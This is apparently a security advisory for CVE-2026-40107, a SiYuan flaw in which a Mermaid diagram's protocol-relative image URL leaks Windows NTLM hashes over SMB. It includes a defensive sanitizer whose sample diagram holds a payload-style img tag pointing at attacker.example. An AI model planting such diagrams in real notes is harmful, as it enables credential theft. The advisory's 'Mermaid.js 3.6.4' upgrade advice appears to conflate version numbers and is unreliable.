Platform: go
Component: github.com/siyuan-note/siyuan/kernel
Fixed in: 3.6.5 (Go pseudo-version 0.0.0-20260407035653-2f416e5253f1)
CVE-2026-40107 describes a Server-Side Request Forgery (SSRF) vulnerability within the SiYuan Kernel, the core of the SiYuan note-taking application. This flaw allows an attacker to induce the application to make requests to arbitrary URLs, potentially leading to data exfiltration or unauthorized access. The vulnerability stems from insecure configuration of Mermaid.js and is addressed in version 0.0.0-20260407035653-2f416e5253f1.
An attacker can exploit this SSRF vulnerability by crafting a malicious Mermaid diagram containing an <img> tag with a protocol-relative URL. When a victim opens a note containing this diagram within the SiYuan Electron client, the client will attempt to fetch the image from the attacker-controlled URL. Critically, on Windows systems, a protocol-relative URL (//attacker.com/image.png) resolves to a UNC path (\\attacker.com\image.png), triggering an automatic SMB authentication attempt. This exposes the victim's NTLMv2 hash to the attacker, facilitating potential credential theft and lateral movement within the network. The blast radius extends to any systems accessible via SMB from the compromised SiYuan client.
This vulnerability was publicly disclosed on 2026-04-10. There is currently no indication of active exploitation campaigns targeting CVE-2026-40107. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept code is likely to emerge given the relatively straightforward nature of the SSRF exploitation pattern.
Exploit Status
EPSS: 0.06% (18th percentile)
CISA SSVC
The primary mitigation for CVE-2026-40107 is to upgrade SiYuan Kernel to version 0.0.0-20260407035653-2f416e5253f1 or later. If an immediate upgrade is not feasible, consider temporarily disabling Mermaid diagrams within SiYuan or restricting the URLs that can be accessed via Mermaid.js. While not a complete solution, configuring a Web Application Firewall (WAF) to block requests to suspicious URLs or restrict access to SMB ports could provide an additional layer of defense. After upgrading, confirm the fix by attempting to load a note containing a malicious Mermaid diagram with a protocol-relative URL; the request should be blocked or sanitized.
Update the Mermaid.js library to version 3.6.4 or higher to mitigate the vulnerability. Ensure you configure `securityLevel: 'strict'` and leave `htmlLabels` disabled (never set `htmlLabels: true`) to prevent malicious markup from being injected through Mermaid diagrams.
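The protocol-relative-to-UNC resolution described above and the configuration hardening in this paragraph, as an added example that is not SiYuan or Mermaid project code: a hypothetical pre-render screen (`screenDiagram`, `sanitizeDiagram`) that flags or neutralises such references in diagram source, alongside the hardened `mermaid.initialize()` settings. It assumes a policy that only document-relative references are allowed; the sample diagram is constructed.

```javascript
// Added example (not SiYuan or Mermaid project code): a hypothetical pre-render
// screen for Mermaid diagram source. Protocol-relative (//host/...) and UNC
// (\\host\...) references are the advisory's case: on Windows they resolve to SMB.
// Hardened mermaid.initialize() settings the advisory recommends (assumption: the
// client passes this object to mermaid.initialize(); Mermaid is not loaded here).
const HARDENED_MERMAID_CONFIG = Object.freeze({
  securityLevel: 'strict',
  flowchart: { htmlLabels: false },
});

// Captures src= / href= values in double quotes, single quotes, or bare.
const ATTR_RE = /\b(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

// Policy (assumption): only document-relative references are allowed.
function isUnsafeReference(raw) {
  // Drop leading control characters/whitespace and fold backslashes so that
  // \\host\share is examined as //host/share.
  const url = raw.replace(/^[\s\u0000-\u001f]+/, '').replace(/\\/g, '/');
  if (url.startsWith('//')) return true;               // protocol-relative -> UNC on Windows
  if (/^file:/i.test(url)) return true;                // local file read
  if (/^[a-z][a-z0-9+.-]*:/i.test(url)) return true;   // any absolute scheme, incl. C:/...
  return false;
}

// Scans diagram text; returns { safe, findings } listing offending values.
function screenDiagram(source) {
  const findings = [];
  for (const m of source.matchAll(ATTR_RE)) {
    const value = m[1] ?? m[2] ?? m[3] ?? '';
    if (isUnsafeReference(value)) findings.push(value);
  }
  return { safe: findings.length === 0, findings };
}

// Replaces each unsafe reference with an inert in-document anchor so the rest
// of the diagram still renders.
function sanitizeDiagram(source) {
  return source.replace(ATTR_RE, (full, dq, sq, bare) => {
    const value = dq ?? sq ?? bare ?? '';
    return isUnsafeReference(value) ? full.replace(value, '#blocked') : full;
  });
}

// Constructed sample: one external image (flagged), one relative asset (allowed).
const SAMPLE_DIAGRAM = [
  'graph TD',
  '  A["<img src=\'//attacker.example/i.png\'>"] --> B',
  '  B["<img src=\'assets/logo.png\'>"]',
].join('\n');
```

Run `screenDiagram` on diagram source before handing it to the renderer and refuse or `sanitizeDiagram` anything it flags; the config object is what the advisory's `securityLevel: 'strict'` recommendation looks like in practice.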
CVE-2026-40107 is a Server-Side Request Forgery (SSRF) vulnerability in SiYuan Kernel, allowing attackers to trigger arbitrary URL fetches via malicious Mermaid diagrams.
You are affected if you are using a version of SiYuan Kernel prior to 0.0.0-20260407035653-2f416e5253f1 and utilize Mermaid diagrams.
Upgrade SiYuan Kernel to version 0.0.0-20260407035653-2f416e5253f1 or later. Consider temporarily disabling Mermaid diagrams as a workaround.
There is currently no indication of active exploitation campaigns targeting CVE-2026-40107, but public proof-of-concept code is likely.
Refer to the SiYuan project's official release notes and security advisories for the most up-to-date information: [https://github.com/siyuan-note/siyuan/releases](https://github.com/siyuan-note/siyuan/releases)